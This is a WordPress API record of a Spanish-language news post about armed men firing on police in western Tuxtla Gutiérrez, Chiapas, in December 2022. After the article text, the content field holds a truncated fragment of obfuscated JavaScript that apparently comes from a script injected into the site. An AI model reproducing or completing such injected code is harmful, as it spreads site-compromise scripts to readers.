{"id":7587,"date":"2022-12-24T02:05:05","date_gmt":"2022-12-24T02:05:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7587"},"modified":"2022-12-24T02:05:05","modified_gmt":"2022-12-24T02:05:05","slug":"presencia-de-hombres-armados-en-la-zona-poniente-de-tuxtla-genera-fuerte-movilizacion-policiaca","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7587","title":{"rendered":"Presencia de hombres armados en la zona Poniente de Tuxtla, genera fuerte movilizaci\u00f3n polic\u00edaca"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"720\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1671843831512.jpg\" alt=\"\" class=\"wp-image-7588\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1671843831512.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1671843831512-300x300.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1671843831512-150x150.jpg 150w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 23 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Este viernes por la tarde-noche, se registr\u00f3 una fuerte movilizaci\u00f3n polic\u00edaca en la zona Poniente de Tuxtla Guti\u00e9rrez por la presencia de hombres armados.<\/p>\n\n\n\n<p>Los primeros reportes informaron que, cerca de las 18 horas se report\u00f3 a los n\u00fameros de emergencias que sujetos a bordo de una camioneta Toyota Tacoma y una BMW de color gris tipo SUV en el Fraccionamiento Laureles.<\/p>\n\n\n\n<p>Al arribo de los elementos de la polic\u00eda los sujetos emprendieron la huida y accionaron sus armas de fuego contra los uniformados.<\/p>\n\n\n\n<p>Con el apoyo de c\u00e1maras se ubic\u00f3 que tomaron el Bulevar Laguitos y se metieron en un camino de terracer\u00eda por un lienzo charro.<\/p>\n\n\n\n<p>Con el apoyo de la Guardia Nacional y diferentes corporaciones se mont\u00f3 un operativo, lo que gener\u00f3 temor en la poblaci\u00f3n.<\/p>\n\n\n\n<p>Hasta el momento se desconoce si los sujetos armados y las unidades fueron asegurados.<\/p>\n\n\n\n<p>Se espera una versi\u00f3n oficial sobre este hecho.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 23 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Este viernes por la tarde-noche, se registr\u00f3 una fuerte movilizaci\u00f3n polic\u00edaca en la zona Poniente de Tuxtla Guti\u00e9rrez por la presencia de hombres armados. Los primeros reportes informaron que, cerca de las 18 horas se report\u00f3 a los n\u00fameros de emergencias que sujetos a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7588,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-7587","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7587","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7587"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7587\/revisions"}],"predecessor-version":[{"id":7589,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7587\/revisions\/7589"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7588"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7587"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7587"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7587"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}